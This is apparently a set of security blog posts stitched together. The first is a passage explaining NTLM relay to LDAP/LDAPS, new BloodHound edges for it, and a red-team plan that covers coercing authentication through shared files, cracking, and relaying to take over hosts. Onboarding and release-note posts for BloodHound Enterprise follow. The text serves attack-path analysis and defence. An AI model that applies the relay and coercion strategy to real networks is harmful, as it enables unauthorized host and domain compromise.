Authentication coercion can trigger WebDAV traffic only if the Web Client service is installed on the host, which it is by default on Windows desktops but requires the Desktop Experience or the WebDAV Redirector feature on Windows servers. Even if it is installed, it also needs to be running, which is not the default on desktops. Most user account authentication coercion primitives will automagically trigger the Web Client service to start. However, computer accounts are more tricky. While most computer account authentication coercion primitives support WebDAV paths, they will not start the Web Client service. Therefore, when we target computer accounts, which is what we do here, we are limited to computers that currently have the Web Client service already running.
When the Web Client service starts, it opens a named pipe called DAV RPC SERVICE, so we can determine whether it is running remotely without admin rights.
One important thing to note is that when the Web Client service runs, it affects all processes running on the host in any context, not just the user who started it. Therefore, if we trigger the service to start via user account authentication coercion, for example, by dropping an authentication coercion file into a high-traffic shared folder, any user that browses the share potentially exposes the host they logged in on to NTLM relay to LDAP.
LDAP Relay Mitigations
LDAP servers support mitigating relay attacks with LDAP signing and LDAP channel binding. Each can be configured individually, and both must be enforced to prevent relay attacks. If either one isn’t, there is a bypass:
If LDAP signing is required and LDAP channel binding is disabled, the attacker can relay to LDAPS instead of LDAP, and because LDAPS encapsulates the traffic in a TLS channel, the domain controller considers the signing requirement to be met.
If LDAP channel binding is enforced and LDAP signing is disabled, the attacker can relay to LDAP with StartTLS, as discussed in this blog post, because the TLS channel is established only post-authentication.
These settings are DC-level settings, not domain-level settings, meaning that you may find different domain controllers with different configurations in the same environment.
Up until Windows Server 2025, domain controllers did not enforce these by default, and given that most organizations have not yet changed both of these settings, at this time, most domain controllers out there are vulnerable to NTLM relay attacks. However, as of Windows Server 2025, domain controllers enforce encryption (sealing) via session security on LDAP SASL bind by default, and with that new configuration, relaying to LDAP or LDAPS is no longer viable. But at this time, domain controllers running on Windows Server 2025 are still few and far between.
Note that enabling LDAP client signing does not mitigate relay attacks, as we’re not abusing LDAP clients; we are abusing web clients.
Viability Criteria
All things considered, relaying to LDAP is viable under the following conditions.
For the relay target, there is at least one domain controller that:
Is running on Windows Server 2022 or older and does not require LDAP signing or LDAPS turned on without channel binding.
Is running on Windows Server 2025 with LDAP signing explicitly disabled.
For the relay victim, the computer must either have the Web Client installed and running or have NTLMv1 enabled.
I Successfully Relayed to LDAP. Now What?
As I reiterated several times, relaying gets you through the authentication step. What you can do with the session afterward depends on the permission of the relay victim. A successful relay to LDAP would allow you to perform any action that the relay victim is permitted to perform in Active Directory, with one caveat — password change/reset must happen over an encrypted channel, so that action is possible only when relaying to LDAPS.
In this scenario, we coerce and relay a computer account to LDAP or LDAPS. In this case, it is very unlikely that the relay victim, a computer account, would have high privileges in the domain. However, computers are allowed to change some attributes of their own computer account, including:
msDS-AllowedToActOnBehalfOfOtherIdentity, which would allow taking over the host via Resource-Based Constrained Delegation (RBCD), as explained in detail in this post.
msDS-KeyCredentialLink, which would allow taking over the host via the Shadow Credentials attack, as explained in detail in this post. Note that a computer account is permitted to add a new value to the msDS-KeyCredentialLink attribute as a validated write, only if there isn’t an existing key credential already present. However, even if there is already a key credential present, the computer account is allowed to delete it and then add a new one, which would require relaying twice: once for deletion and a second time for the Shadow Credentials attack.
Introducing the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS Edges
The new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges come out of the Authenticated Users node and lead into the victim computer node, just like the CoerceAndRelayNTLMToADCS edge, because here, too, the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
Connect to the domain controllers via LDAP and LDAPS and attempt to perform NTLM authentication with and without signing and channel binding to determine if they’re enabled, required, or disabled. This can be collected without admin access.
Connect to the relay victim via SMB to check whether the DAV RPC SERVICE named pipe is open. This can be collected without admin access.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the CoerceAndRelayNTLMToLDAP edge if the following criteria are met:
There is at least one domain controller running on Windows 2022 or older, and LDAP signing is not required.
The relay victim has the Web Client service running.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
BloodHound creates the CoerceAndRelayNTLMToLDAPS edge if the following criteria are met:
There is at least one domain controller running on Windows 2022 or older, and LDAPS is available without channel binding required.
The relay victim has the Web Client service running.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the Relay Targets section in the information panel lists all the affected domain controllers that can be targeted.
Abuse
As mentioned above, following a successful relay, the relay victim can configure RBCD or Shadow Credentials against its own computer account to compromise the host. In addition to that, if the computer account happens to have any abusable permissions in Active Directory, those will be viable as well, with the caveat that the ForcePasswordChange edge (password reset) is only abusable via LDAPS and not via LDAP.
In the real world, it is very common to find domain-joined workstations with the Web Client running, and domain controllers are very rarely configured to require both LDAP signing and channel binding or run on Windows Server 2025, so this is a very rel(a)yable way to compromise domain-joined hosts. It is even more common to abuse this technique for local privilege escalation on domain-joined workstations due to the ease of turning the Web Client service on and coercing authentication from SYSTEM as a low-privileged user.
LDAP-Specific Limitations
You may have noticed that BloodHound currently doesn’t take NTLMv1 into consideration for edge creation.
Another important limitation to note is that the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are created based on the current Web Client service status, but it is very dynamic. The fact that the service was not running on a host during collection does not mean it will remain that way and that the host is not exposed.
General Limitations
So far, we have mentioned some limitations affecting specific edge types. There are also limitations affecting all the new NTLM relay edges:
Only computer account authentication coercion scenarios are considered. User authentication coercion is out of scope at this time.
Only coercion scenarios are considered. Opportunistic relay attacks, i.e., waiting for a suitable relay victim to authenticate to an attacker-controlled host, such as authenticated vulnerability scanners, are out of scope.
Firewalls or sorts and network restrictions are out of scope and not taken into consideration for these new relay edges, just as they were not taken into consideration for any of the previous BloodHound edges.
We also make a general assumption that computer account authentication coercion can be triggered by Authenticated Users, as explained earlier.
Future Work
We plan to introduce additional relay edges in the future. We already have relay to MS SQL and WinRM on our roadmap. We are always open to suggestions if you have additional ideas/requests.
NTLM Abuse Strategy
Let’s take everything covered in this post and put together an NTLM abuse strategy.
First, let’s make some observations and assumptions:
NTLM challenge-response capture is less noisy than NTLM relay, but cracking depends on the strength of the password.
User authentication coercion can trigger the Web Client service to start, but computer authentication coercion can’t.
Scanning for hosts with the Web Client service running can be noisy. Similarly, collecting session information is noisy or even impossible without local admin rights.
NTLM relay attacks should be precise on red team operations. The “Spray and Pray” approach should be avoided.
Given the above, I propose the following approach:
At the beginning of an op/assessment, cast a wide net for user authentication coercion through watering hole attacks on high-traffic file shares or web pages. Try to coerce and capture both WebDAV and SMB traffic if you can. SMB is sometimes more likely to succeed, but this is your opportunity to start the Web Client service on every affected client.
As you capture NTLM responses, keep track of where users authenticate from — it tells you where they have a session. It is, in a way, passive session collection.
Attempt to crack passwords of interesting accounts that can help you escalate privileges or achieve your objectives. Don’t waste your GPU on meaningless accounts.
If you identify an interesting user but can’t crack the password, it’s time to relay.
Target the computer on which the user was active and compromise it via relay to ADCS (ESC8) or via relay to LDAP/LDAPS (RBCD or Shadow Credentials).
Once you gain admin access to the host, you can potentially avoid the risk involved in lateral movement and credential abuse by placing an authentication coercion file on the user’s desktop via the C$ share and relaying the NTLM exchange to the target resource.
What is Microsoft Doing About It?
Microsoft has been making efforts to mitigate these attacks. As I mentioned, relaying to LDAP is no longer possible against domain controllers running Windows Server 2025, and all Windows 11 and Windows Server 2025 hosts now require SMB signing by default. It’s a good start.
Microsoft has been working on a much more significant initiative to deprecate NTLM altogether. They’ve identified the following reasons why Windows hosts still use NTLM and have started working on solutions:
Until recently, the only option for local account authentication was NTLM. Microsoft is in the process of rolling out a “local KDC” to support Kerberos authentication for local accounts.
When clients don’t have a line of sight to a domain controller, they can’t obtain Kerberos tickets and have to fall back to NTLM. Microsoft is in the process of rolling out IAKERB, which will turn every Windows host into a Kerberos proxy.
Kerberos authentication requires mapping the resource that the client is trying to access to a service account. This is done through service principal names (SPN). SPNs usually use hostnames rather than IP addresses, so when a client attempts to access a resource by IP address, Kerberos authentication typically fails. However, as of Windows Server 2016, SPNs support SPNs with IP addresses.
Most NTLM usage is a result of software hard-coded to call the NTLM authentication package instead of the Negotiate package, which wraps Kerberos and NTLM and negotiates the most suitable option. Microsoft has been working on fixing these hard-coded issues in its own software, and, rumor has it, they have also been working with 3rd parties to fix their code.
Microsoft intends to have NTLM disabled by default (not completely removed), which means that even when the day finally comes, we will likely still find organizations that turn it back on, just as we still find hosts with NTLMv1 enabled. Last I heard, Microsoft had plans to have it done by 2028, but I believe they are already behind schedule, and, if history has taught us anything, we should expect it will take much longer than that.
Kerberos is NOT the Solution
For many years, people thought that Kerberos was not susceptible to relay attacks because it is based on tickets, and every ticket is issued to a specific service, so you can’t relay it to arbitrary targets. But that’s no longer the case. As James Forshaw discovered and Andrea Pierini weaponized, there are authentication coercion primitives that allow the attacker to control the service name for which the relay victim obtains a Kerberos ticket. These coercion primitives negotiate session security with signing, so they can’t be relayed to LDAP/LDAPS. However, they are compatible with relaying to SMB and ADCS.
Therefore, disabling NTLM is not the solution. Ensuring all servers enforce signing and channel binding is the right way to mitigate relay attacks.
We may add Kerberos relay edges to BloodHound in the future. Until then, you can be confident that whenever you see CoerceAndRelayNTLMToADCS or CoerceAndRelayNTLMToSMB edges, you can relay either NTLM or Kerberos.
Why Are We Releasing It Now?
There are many misconceptions about the problem and the solution for the NTLM relay problems. The new edges we introduced into BloodHound will hopefully bring clarity and put it in the spotlight, helping organizations prioritize one of the most significant yet underestimated risks affecting Active Directory environments.
Better Remediation Strategies
The remediation guidance for NTLM relay attacks is often “enforce everything, everywhere”, which is not very practical in a large environment that requires backward compatibility. However, BloodHound now helps defenders see what’s actually viable in their environments and prioritize high-impact/exposure targets. BloodHound has a set of pre-built cypher queries that can get you started with that.
Conclusion
NTLM relay attacks are far from dead. In fact, they’re often easier to execute and more effective than many security practitioners realize. This old technique remains one of the paths of least resistance in modern Active Directory environments, routinely enabling trivial pivots to high-value targets. The introduction of NTLM relay edges in BloodHound has made identifying and visualizing these attack paths remarkably simple: with just a few clicks, an operator can see how Authenticated Users can relay their way from zero to hero. In other words, BloodHound now depicts, with clear, intuitive edges, what once required stitching together information from multiple tools, showing defenders the real risks they face while allowing attackers to, once again, think in graphs.
Getting Started with BHE — Part 2Contextualizing Tier ZeroTL;DRAn accurately defined Tier Zero provides an accurate depiction of Attack Path Findings in your BHE tenant.Different principals (groups, GPOs, OUs, etc.) have different implications when Tier Zero is defined — understanding these will help reduce confusion around why something is showing up as Tier Zero.Welcome to round two of the Getting Started with BloodHound Enterprise series. Today’s focus will be on understanding and contextuali
An accurately defined Tier Zero provides an accurate depiction of Attack Path Findings in your BHE tenant.
Different principals (groups, GPOs, OUs, etc.) have different implications when Tier Zero is defined — understanding these will help reduce confusion around why something is showing up as Tier Zero.
Welcome to round two of the Getting Started with BloodHound Enterprise series. Today’s focus will be on understanding and contextualizing Tier Zero and ensuring that we have an accurate depiction of the Attack Paths that exist in your BloodHound Enterprise (BHE) tenant.
I started the last blog with a problem statement meant to align our focus, and I’ll include another one today. In this case, that would look something like:
“Have we identified (and configured) Tier Zero in our environment so that we have an accurate depiction of the Attack Paths that are increasing risk in our environment?”
In order to make progress here, we need to define and understand what it means when we’re talking about Tier Zero. You may have a unique definition for your organization which may require some additional due diligence, however our definition here at SpecterOps is:
“Tier Zero is a set of assets in control of enterprise identities and their security dependencies”
Where:
Control: A relationship that can contribute to compromising the controlled asset or impact its operability
Security dependency: A component whose security impacts another component’s security [1]
Out of the box, BHE comes with some default Tier Zero options [2] that will always be marked as a Tier Zero object for each domain collected, including:
The Domain head object
AdminSDHolder object
Built-in Administrator account
Domain Admins
Domain Controllers
Schema Admins
Enterprise Admins
Key Admins
Enterprise Key Admins
Administrators
Not listed here are:
Users and Computers that are members of these groups, however they inherit Tier Zero classification from the Groups they share the “MemberOf” relationship with:
T0 Inheritance via Group Membership
Organizational Units (OUs) and Containers that contain these Tier Zero objects, though they are assigned Tier Zero based on containing Tier Zero objects as indicated below:
T0 Inheritance via “Contains” Relationship
Group Policy Objects (GPOs) that apply to these objects, though these are automatically marked as Tier Zero objects when they apply to a separate Tier Zero object:
T0 Inheritance via “GPLink” Relationship
What is not included in the default definition are groups like Account Operators (among several others). This is a group that, in your domain(s), may or may not be empty, and may or may not contain your helpdesk which generally opens wide your Tier Zero unnecessarily. There are also accounts like the MSOL account, responsible for Azure synchronization; your Privileged Access Workstations (PAWs); Password Managers (which have the ability to change the password on Tier Zero principals); and so on. These often become evident after the first collection when you may see a handful of principals that “shouldn’t be there” because there is a known relationship that is 100% valid (which you will generally know based on additional context you may have as a member of your organization). These are your “custom” Tier Zero objects that didn’t get wrapped up in BHE’s initial default definition. We do, of course, have additional documentation for these [3,4,5,6,7,8,9,10].
These custom additions will need to be manually added to Tier Zero in one of a couple different ways:
Tagging Tier Zero from the Explore Page
The first is through the Explore page, where you can search for individual objects and add them by right-clicking the object and selecting “Add to Tier Zero.” Similarly, if you select the “Explore” option for a Finding on the Attack Paths page, that will take you to this same Explore page where you can similarly add the object to Tier Zero. See below:
Exploring an Attack Path Finding to Add the Principal to Tier ZeroAdding the Attack Path Finding Principal to Tier Zero via the Explore Page
Either of these methods are a bit piecemeal and not the fastest ways to modify Tier Zero, but they are a good way to inspect and validate your Tier Zero additions during this process. Don’t fear, though, there’s a faster way to add objects to Tier Zero.
The second option is through the Group Management page which takes you to an overview of your Tier Zero:
Add or Remove Members (from Tier Zero) on the Group Management PageSpecify Members for Bulk Add on the Group Management Page
With this option, you can specify several names to add to Tier Zero and do a bulk add of any principals. Be aware that the changes that will take place, as noted above, include:
Groups that are added will cause members (computers, groups, users) to be added to Tier Zero
If the principal being added to Tier Zero is in an OU that is non-Tier Zero, the OU will be added to Tier Zero
If the principal being added to Tier Zero has GPOs that apply to it that are non-Tier Zero, these will be marked as Tier Zero
An important note to make about either of these options is that neither is necessarily the “right” or the “wrong” way, and both get you to the same end state. Generally, I find that the former (adding via “Explore”) is best suited when inspecting individual Findings on the Attack Paths page, as these may merit additional analysis before adding the object to Tier Zero. On the other hand, the “Group Management” page is great when you have a series of objects you want to add and don’t require additional inspection of anything before adding them to your Tier Zero definition. Basically, if you’re looking for a batch of updates that you want to add at one time, “Group Management” is the best way to go.
New Tier Zero additions will also cause new Findings to appear where non-Tier Zero principals have permissions against these newly-added Tier Zero principals. But this is good — this is what we’re looking for.
And that’s the next step — custom-tagged Tier Zero assets. When this is complete, you’ll have a clearer picture of what the Attack Paths and valid Findings actually are. In some cases, this may point to a couple of groups with very extensive permissions, or you might find a swath of misconfigurations that you did not realize existed buried deep in your AD structure.
What does this look like in practice? Here’s an example of what your BHE tenant might look like before you’ve added any context (red indicates an Attack Path Finding in BHE, for clarity):
Contextualizing Tier Zero — “Default” View
Here we have a “default” Tier Zero object (Domain Admins) and four Findings under the “Generic All” Attack Path. If we expand this out, to see full exposure, it might look like this (black lines depict relationships):
Contextualizing Tier Zero — Exposure View
Here we can see that there’s only one Tier Zero principal (Domain Admins), with four Attack Paths, but an exposure count of nine (count of non-Tier Zero principals). Again, this is after default collection with no additional contextualization except that we’re visualizing exposure in a simplified scenario.
But you might look at one of those and say, “Hey, Group: A is a Tier Zero object, too.” So we add it to Tier Zero and then we see the following:
Contextualizing Tier Zero — Defined Tier Zero View
Now we have two Tier Zero principals:
Domain Admins
Group: A
We also have eight Attack Paths:
Three Tier One principals with GenericAll over Domain Admins
Five Tier One principals with GenericWrite over Group: A
We would also see a slight change in Exposure because one of the nine principals that would previously contribute to our count has been added to Tier Zero. Exposure here has decreased to eight.
Now we have a better picture of what the Findings are in our environment, which allows us to better understand what needs attention, what needs to be mitigated, and what’s potentially leading to unnecessary exposure to Tier Zero. This is because we’ve taken the time to define Tier Zero for our organization.
Contextualizing your Tier Zero definition is important because otherwise your Findings will not accurately represent tiering violations, which is one of the first things you need to be able to see within BHE. This is what the Attack Path page shows you, and part of the reason it can be so valuable for organizations is that it summarizes pathways that cause exposure risks to your critical assets.
Once we have all that figured out, we’ll run into either of the following outcomes with no change in exposure:
Larger Tier Zero definition, decrease in Findings
Larger Tier Zero definition, increase in Findings
Objectively speaking, neither of these is better or worse than the other based on the change in Findings. Either is better than the previous state of visibility because it represents a more accurate view of your domain and the true Attack Paths that require your attention.
If we don’t figure this out, nothing changes and when we open up BHE we’re going to see an inaccurate depiction of what we actually care about. Again, that’s pathways (Attack Paths) that cause exposure risks to your critical assets (Tier Zero).
Join me again next time for Part 3, where we’ll work on identifying sources of exposure using Cypher queries.
[10] — “Defining the Undefined: What is Tier Zero, Pt IV,” by Martin Christensen, Lee Chagolla-Christensen, and Jonas Bülow Knudsen: https://www.youtube.com/watch?v=lLpCPBJIFkQ
Getting Started with BHE — Part 1Understanding Collection, Permissions, and Visibility of Your EnvironmentTL;DRAttack Path visibility is dependent upon scope of collection; complete collection is dependent upon appropriate permissions.Your collection strategy benefits from tiering just like your domain(s).IntroductionWelcome to my series on Getting Started with BloodHound Enterprise! This series comes after having had several discussions with customers about internal requirements for starting co
Understanding Collection, Permissions, and Visibility of Your Environment
TL;DR
Attack Path visibility is dependent upon scope of collection; complete collection is dependent upon appropriate permissions.
Your collection strategy benefits from tiering just like your domain(s).
Introduction
Welcome to my series on Getting Started with BloodHound Enterprise! This series comes after having had several discussions with customers about internal requirements for starting collection and I wanted to be able to provide something moving forward that reads more like a blog/conversation that’s easy to digest. That said, this doesn’t mean it’s irrelevant to the BloodHound Community Edition (BHCE) users, and there will still be components of information that are valuable for users on both the Enterprise and Community Edition sides. This series will focus more on users who are interested in gaining maximum visibility of their environments, defining Tier Zero, and understanding how to identify potential sources of exposure.
So, if you’ve got your BloodHound Enterprise (BHE) tenant up and running and are asking yourself “What now? Where do I start when it comes to BHE?” this series will give you actionable next steps and useful context for maximizing your BHE tenant.
Active Directory — Collecting with SharpHound
It may be obvious, but the first two things that need to be addressed are Collection and Permissions. These are necessary because you can’t see anything without collection, and collection is ultimately contingent upon the permissions you’re willing to grant your collector, which in this case discussion will be SharpHound (Active Directory). In other words, with greater permission comes greater visibility. Uncle Ben never said that to Peter Parker in Spider-Man, but he would have if they had been working on a SharpHound install.
More directly, talking about collection and permissions here will help address the following problem statement. If this resonates with you, you’re in the right place:
Are we positioned to collect the data required to accurately depict objective exposure risks that result in Attack Paths in our environment?
Collection and associated permissions include:
Active Directory Structure Data: Authenticated User group membership
Certificate Services: Authenticated User group membership
Local Group Membership: local Administrator on domain-joined systems
Sessions (logons): local Administrator on domain-joined systems
Domain Controller Registry: Administrator on domain controller(s)
Certificate Authority Registry: Administrator on enterprise CA(s)
The first (AD structure data) is the baseline requirement for BHE functionality; the others provide valuable context for understanding exposure risks that require additional data beyond what can be pulled from a domain controller via LDAP queries. Note that the second, Certificate Services, can be collected with the same basic privileges that AD structure data can be collected.
But what does this all mean practically? Depending on what your domain looks like it could be the difference between seeing 5% exposure and 95% exposure. I often deal with a lot of kickback on this series of requirements, but this is the tradeoff required for adequate visibility, accurate attack path mapping, and inherent risk associated with the relationships and configurations that exist in your AD environment.
If you do not have all of this collection, you’re going to miss some important information:
Where do ADCS attack paths exist that enable domain takeover?
Where do logon sessions exist that facilitate credential theft resulting in privilege escalation or lateral movement?
Where are tiering violations occurring because of bad practices with admins logging into systems at a lower tier?
This leads into a secondary discussion, which is often asked in the form of “How many resources do I need to get this data into BHE?”
In some cases, SharpHound and AzureHound can both be run on the same server. However it depends on how much is being collected and how you break up the schedule for your collectors. If you have a large environment with 100,000 users and you try collecting both AD and Azure environments at the same time, you’re probably going to run into some issues.
This next discussion will focus specifically on SharpHound, and for proper, hardened collection of SharpHound, I would recommend as many collectors as you have Tiers. I’ll use the standard three-tier model here:
A Tier Zero collector collects everything at the Tier Zero level, which easily accounts for the first requirement, but also allows visibility of all the others (at Tier Zero). You can run your AD structure data, Certificate Services, CA/DC registries, and Tier Zero group and session collection here. This is the primary visibility you want.
A Tier One collector should only need to collect group and session information at Tier One.
A Tier Two collector should only need to collect group and session information at Tier Two.
Here’s a visualization to depict what this might look like:
Tiered SharpHound Deployment
I do recommend following this tiering structure as much as possible, as this scoping of collection can help mitigate unnecessary exposure as a result of cross-tiered collection. While I do see variants of this where SharpHound is either Tier Zero or Tier One and collects from every tier, a tiered collection structure is the safest route forward for collection.
I also recommend following our hardening guidance for the SharpHound service account, which we list here [1]. This includes using a group managed service account (gMSA) for the SharpHound service account, rather than a regular AD user account. Additionally, adding this account to the Protected User group will limit the ability for Kerberos delegation and authentication relaying attacks.
Whichever path you choose here, understand that the privileges you give to the collector will align with the visibility you have of your environment. If you’re content with only seeing direct permissions based on Access Control Entries (ACEs), AD structure data will be sufficient. But if you want group and session collection, and if you would like to have full visibility of ADCS attack paths — you will need additional collection.
For more information on Data Collection and Permissions, check out our documentation here [2].
And that’s it for now! Come back later for our next topic, which will focus on what to do after you’ve got collection up and running and you’re ready to start working on cleaning things up: Contextualizing Tier Zero.
Just in time for the holidays, sharper tools for faster defenseToday, the SpecterOps team rolled out a number of new features, product enhancements, and recommendations intended to help users of BloodHound Enterprise and BloodHound Community Edition more easily visualize attack paths and show improvements in identity risk reduction over time. Scroll down to learn more about v6.3.0 and related changes to BloodHound Enterprise and BloodHound Community Edition.BloodHound Enterprise UpdatesReport on
Just in time for the holidays, sharper tools for faster defense
Today, the SpecterOps team rolled out a number of new features, product enhancements, and recommendations intended to help users of BloodHound Enterprise and BloodHound Community Edition more easily visualize attack paths and show improvements in identity risk reduction over time. Scroll down to learn more about v6.3.0 and related changes to BloodHound Enterprise and BloodHound Community Edition.
BloodHound Enterprise Updates
Report on attack path risk with Revamped Posture page
The BloodHound Enterprise team has completely redesigned the Posture page, delivering several significant enhancements:
Enhanced visibility into resolved attack paths
New metrics to track remediation progress over time
New filter and search capabilities to highlight specific improvements
Consolidated view of relevant data into a single page, reducing unnecessary scrolling
The new Posture page in BloodHound Enterprise provides visibility into resolved attack paths and additional metrics for board-level reporting.The new Posture page in light mode — this author’s unpopular, but preferred version :)
Improved Analysis Algorithm
This is a massive upgrade to BloodHound Enterprise’s risk analysis capability with a new algorithm we call “Butterfly”:
Enhanced risk scoring with “Impact” analysis
Granular risk measurement per finding for better prioritization
Support for hybrid attack path risk analysis
Let’s get more specific with the first two bullets; Enhanced risk scoring and better prioritization.
Enhanced risk scoring with “Impact” analysis
BloodHound Enterprise has historically assessed the risk of attack paths by modeling the principals that can target specific identities and resources:
Starting with v6.3, BloodHound will also incorporate Impact analysis — the principals that can be attacked by a target node:
This new bi-directional risk analysis significantly improves BloodHound Enterprise capabilities in determining severity for attack paths:
The “Butterflly” algorithm as we call it internally
For example, here is the improved analysis in action with Kerberoastable Users:
A quick refresher on Kerberoast attack: A Kerberoast attack exploits the Kerberos authentication protocol by targeting service account passwords in a Windows Active Directory environment. An attacker requests Kerberos service tickets for Service Principal Names (SPNs), extracts them, and performs offline password cracking since the tickets are encrypted with the service account’s NTLM hash. If successful, the attacker gains the plaintext service account credentials, which can be used for lateral movement or privilege escalation.
Anyone can request the service ticket for a kerberoastable account which means the exposure is always 100%. The risk of this finding is what an attacker could do with access to that account with a successful crack. Therefore, the risk is determined by the impact; or what can be attacked once the attacker has control of the account.
Granular risk measurement per finding for better prioritization
BloodHound Enterprise delivers better prioritization by analyzing risk per finding with v6.3. Historically, risk was calculated per attack path type:
BHE v6.2 (previous version) with no granular risk measurements per finding.
Now, BloodHound Enterprise will assess the risk of every finding, allowing you to pinpoint where to start first:
BHE v6.3 (new version) with enhanced risk analysis and granularity at the finding level
In the example above, one particular login is more risky than the others and should be prioritized. BloodHound Enterprise is simplifying the analysis for you to enable better prioritization. In this case, APP4.TITANCORP.LOCAL is prioritized above the rest as DOMAIN USERS has the ability to RDP into the host and capture the user session:
100% of users with access to a computer with a user session from SVCINTRUST (a Tier Zero account)
This granularity is on every finding. Let’s look again at a large list of Kerberoastable users. Thanks to this improvement, we now know where to prioritize our efforts:
BloodHound Enterprise prioritizing Kerberoastable users for remediation based on Impact
BloodHound Common Updates
All enhancements listed below are available to both BloodHound Community and BloodHound Enterprise users.
Node/Edge Label Toggle makes for more flexible public reporting
A long-requested feature has returned to BHCE and also available in BHE, allowing users to show or hide sensitive node and edge labels directly in the UI. This was contributed by the community member @palt — whom we give major kudos to!
The Node/Edge label toggle has returned due to popular demand. This feature allows users to show or hide sensitive node and edge labels directly in the UI.
New CoerceToTGT Edge Type
This new edge type provides more visibility into unconstrained delegation scenarios:
Indicates principals configured for potential ticket-granting ticket (TGT) coercion
For Enterprise users, this consolidates previous “Unconstrained Delegation” findings into a single, more informative attack path finding
The new CoerceToTGT Edge Type provides additional visibility into unconstrained delegation scenarios.BloodHound Enterprise automatically identifying the new CoerceToTGT / Unconstrained Delegation Attack Paths
Single Sign On (SSO) Improvements
Added OpenID Connect (OIDC) support alongside existing SAMLv2 providers
Automatic redirection for environments with a single SSO provider
Enterprise Domain Controllers Group Improvement
Improved consistency when creating an Enterprise Domain Controllers group to reduce confusion depending on how a collection was performed (note: requires a SharpHound upgrade).
Minor Improvements and Bug Fixes
The release also includes several quality-of-life improvements:
Fixed scrolling issues in entity panels
Resolved file upload hanging problems
Corrected a pre-saved Cypher query for “Kerberoastable users with most privileges”
Improved error handling in SharpHound data collection
Recommendations, Early Access and Further Information
Upgrade Recommendations:
Upgrade to SharpHound v2.5.12 (Enterprise) or v2.5.9 (Community Edition)
Upgrade to AzureHound to v2.2.1 for performance improvements
Early Access Features
Administrators can enable the new analysis algorithm from the Administration -> Early Access configuration screen
To learn more about this release, sign up and join us for BloodHound Live: Monthly Release Recap on December 18 — and bring your questions! All BloodHound users can find expanded details on these updates today in our release notes or by contacting their Technical Account Manager.